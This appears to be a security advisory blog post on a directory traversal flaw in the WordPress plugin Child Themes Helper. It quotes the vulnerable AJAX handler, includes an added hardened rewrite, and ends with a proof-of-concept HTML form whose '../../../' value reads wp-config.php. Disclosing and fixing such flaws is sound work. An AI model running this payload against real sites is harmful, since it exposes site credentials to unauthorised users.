Full Disclosure of Authenticated Arbitrary File Viewing Vulnerability in Child Themes Helper
In our previous post we detailed an authenticated arbitrary file upload vulnerability in the plugin Child Themes Helper, which was caught by our proactive monitoring of changes made to plugins in the Plugin Directory (monitoring intended to catch serious vulnerabilities). It looks like there is quite a bit of inadequately secured code in the plugin, but one other issue that stood out is an authenticated arbitrary file viewing vulnerability.
The plugin makes the function editFile() available to those logged in to WordPress:
add_action( 'wp_ajax_editFile', Array( $pas_cth_AJAXFunctions, "editFile" ) );
That function will display the contents of an arbitrary file:
function editFile() {
    // The three request values are sanitized but never restricted to the theme directory.
    $inputs = [
        'directory' => sanitize_text_field( $_POST['directory'] ),
        'file'      => sanitize_file_name( $_POST['file'] ),
        'themeType' => sanitize_text_field( $_POST['themeType'] ),
    ];
    switch ( strtolower( $inputs['themeType'] ) ) {
        case PAS_CTH_CHILDTHEME:
            // The user-supplied 'directory' is concatenated straight into the path,
            // so "../" sequences walk out of the child theme directory.
            $file = $this->activeThemeInfo->childThemeRoot . PAS_CTH_SEPARATOR . $this->activeThemeInfo->childStylesheet . PAS_CTH_SEPARATOR . $inputs['directory'] . PAS_CTH_SEPARATOR . $inputs['file'];
            $readOnly = 'false';
            break;
        case PAS_CTH_TEMPLATETHEME:
            $file = $this->activeThemeInfo->templateThemeRoot . PAS_CTH_SEPARATOR . $this->activeThemeInfo->templateStylesheet . PAS_CTH_SEPARATOR . $inputs['directory'] . PAS_CTH_SEPARATOR . $inputs['file'];
            $readOnly = 'true';
            break;
    }
    $inputs['readOnlyFlag'] = $readOnly;
    // The file is read and echoed back to any logged-in user; there is no capability check anywhere in the function.
    $fileContents = stripslashes( str_replace( ">", "&gt;", str_replace( "<", "&lt;", file_get_contents( $file ) ) ) );
    echo "EDITFILEOUTPUT:{";
    echo "ARGS<:>" . json_encode( $inputs );
    echo '+|++|+';
    echo "EDITBOX<:>{$fileContents}";
}
What is missing from that code is a restriction on which users can access it (any logged-in user can call it) and, most likely, protection against directory traversal, since the user-supplied directory value is placed directly into the file path.
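For comparison, the following is an added example of how such a handler can be hardened; it is not the plugin's code and does not come from the original post. It assumes a hypothetical nonce action name ('pas_cth_edit_file') and POST field ('nonce'), uses WordPress's stock get_stylesheet_directory()/get_template_directory() in place of the plugin's activeThemeInfo object, and assumes the theme type values are the strings 'child' (as used in the proof of concept) and 'template'. The two additions are a capability check before anything is read and a containment check on the canonical path so that traversal cannot leave the theme directory.

```php
<?php
// Added example (not the plugin's code): a hardened file-viewing AJAX handler.
// Assumptions: nonce action 'pas_cth_edit_file' and POST field 'nonce' are
// hypothetical; 'child'/'template' are assumed values for the theme type.

/**
 * Resolve $directory/$file inside $base and refuse any result that escapes it
 * (traversal with "../", absolute paths, or symlinks pointing outside).
 * Returns the canonical path on success, false otherwise.
 */
function pas_cth_example_resolve_within( $base, $directory, $file ) {
    $base_real = realpath( $base );
    if ( false === $base_real || '' === $file ) {
        return false;
    }
    // Null bytes can truncate paths at the filesystem layer; reject them outright.
    if ( false !== strpos( $directory, "\0" ) || false !== strpos( $file, "\0" ) ) {
        return false;
    }
    // realpath() collapses "../" and resolves symlinks, so the comparison below
    // is made on what the filesystem would actually open.
    $candidate = realpath( $base_real . '/' . $directory . '/' . $file );
    if ( false === $candidate || ! is_file( $candidate ) ) {
        return false;
    }
    // Containment: the canonical path must start with base + separator, so a
    // sibling directory such as "/themes/child-other" cannot match "/themes/child".
    $prefix = rtrim( $base_real, '/' ) . '/';
    if ( 0 !== strncmp( $candidate, $prefix, strlen( $prefix ) ) ) {
        return false;
    }
    return $candidate;
}

function pas_cth_example_edit_file() {
    // 1. Restrict who may reach the handler: viewing theme files is what the
    //    stock theme editor gates behind the 'edit_themes' capability.
    if ( ! current_user_can( 'edit_themes' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }
    // 2. CSRF protection: the request must carry a valid nonce (hypothetical action name).
    check_ajax_referer( 'pas_cth_edit_file', 'nonce' );

    $theme_type = strtolower( sanitize_text_field( wp_unslash( $_POST['themeType'] ?? '' ) ) );
    $directory  = sanitize_text_field( wp_unslash( $_POST['directory'] ?? '' ) );
    $file       = sanitize_file_name( wp_unslash( $_POST['file'] ?? '' ) );

    switch ( $theme_type ) {
        case 'child':
            $base      = get_stylesheet_directory();
            $read_only = false;
            break;
        case 'template':
            $base      = get_template_directory();
            $read_only = true;
            break;
        default:
            wp_send_json_error( 'unknown theme type', 400 );
    }

    // 3. Path containment: the resolved file must live under the chosen theme.
    $path = pas_cth_example_resolve_within( $base, $directory, $file );
    if ( false === $path ) {
        wp_send_json_error( 'file not found or outside the theme directory', 400 );
    }

    wp_send_json_success( [
        'readOnlyFlag' => $read_only,
        'contents'     => esc_html( file_get_contents( $path ) ),
    ] );
}
add_action( 'wp_ajax_pas_cth_example_edit_file', 'pas_cth_example_edit_file' );
```

With these checks a request like the proof of concept below fails twice over: a subscriber-level account is rejected at the capability check, and even a theme editor asking for "../../../wp-config.php" is rejected because the canonical path resolves outside the theme directory. Note that a plain prefix comparison on the raw, unresolved string would not be sufficient, which is why the comparison is done on the realpath() result.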
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously fully disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.
Proof of Concept
The following proof of concept will display the contents of the WordPress configuration file, when logged in to WordPress and when a child theme has been selected in the plugin’s options.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=editFile" method="POST">
<input type="hidden" name="themeType" value="child" />
<input type="hidden" name="directory" value="../../../" />
<input type="hidden" name="file" value="wp-config.php" />
<input type="hidden" name="fileContents" value="[file contents]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>